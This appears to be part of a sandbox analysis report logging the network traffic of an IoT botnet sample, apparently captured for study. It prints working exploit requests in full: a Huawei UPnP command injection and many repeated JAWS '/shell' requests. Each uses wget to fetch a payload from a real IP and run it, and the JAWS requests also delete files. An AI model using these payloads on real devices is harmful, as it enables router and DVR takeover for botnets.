                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:51.164400101 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            394192.168.2.2333308143.204.96.6080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.732902050 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:18.935878992 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:32:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            395192.168.2.2333370104.116.119.10780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.744838953 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:19.032727957 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:18 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:18 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 32 31 65 33 36 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 33 38 26 23 34 36 3b 31 35 31 31 61 65 33 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;121e3617&#46;1706279538&#46;1511ae33</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            396192.168.2.2344156194.65.61.8880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.753122091 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            397192.168.2.233637441.89.94.8480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.789309025 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:20.512566090 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:22.528244972 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:26.591696978 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:34.782594919 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:50.908392906 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            398192.168.2.235157847.246.10.10080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.896071911 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:19.258922100 CET478INHTTP/1.1 400 Bad Request
                                                            Server: Tengine
                                                            Date: Fri, 26 Jan 2024 14:32:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 249
                                                            Connection: close
                                                            Via: cache2.th5[,0]
                                                            Timing-Allow-Origin: *
                                                            EagleId: 0000000017062795390007837e
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            399192.168.2.235425018.180.111.20480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:18.971767902 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:19.300967932 CET420INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            400192.168.2.235161247.246.10.10080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:19.110764980 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:19.480477095 CET478INHTTP/1.1 400 Bad Request
                                                            Server: Tengine
                                                            Date: Fri, 26 Jan 2024 14:32:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 249
                                                            Connection: close
                                                            Via: cache4.th5[,0]
                                                            Timing-Allow-Origin: *
                                                            EagleId: 0000000017062795392246486e
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            401192.168.2.2337814182.23.12.2680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:19.158178091 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            402192.168.2.234833452.87.15.13580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:19.584225893 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:19.701766014 CET78INHTTP/1.1 400 BAD_REQUEST
                                                            Content-Length: 0
                                                            Connection: Close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            403192.168.2.2354662185.133.20.880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:19.590375900 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:19.714173079 CET932INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 681
                                                            date: Fri, 26 Jan 2024 14:32:19 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            404192.168.2.2333456154.38.124.18280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:19.617456913 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:19.772730112 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            405192.168.2.233890477.246.102.7980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:19.760227919 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:19.970417976 CET338INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Fri, 26 Jan 2024 14:32:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            406192.168.2.233507693.193.221.12580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:19.779361963 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:20.004901886 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.24.0
                                                            Date: Fri, 26 Jan 2024 14:32:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
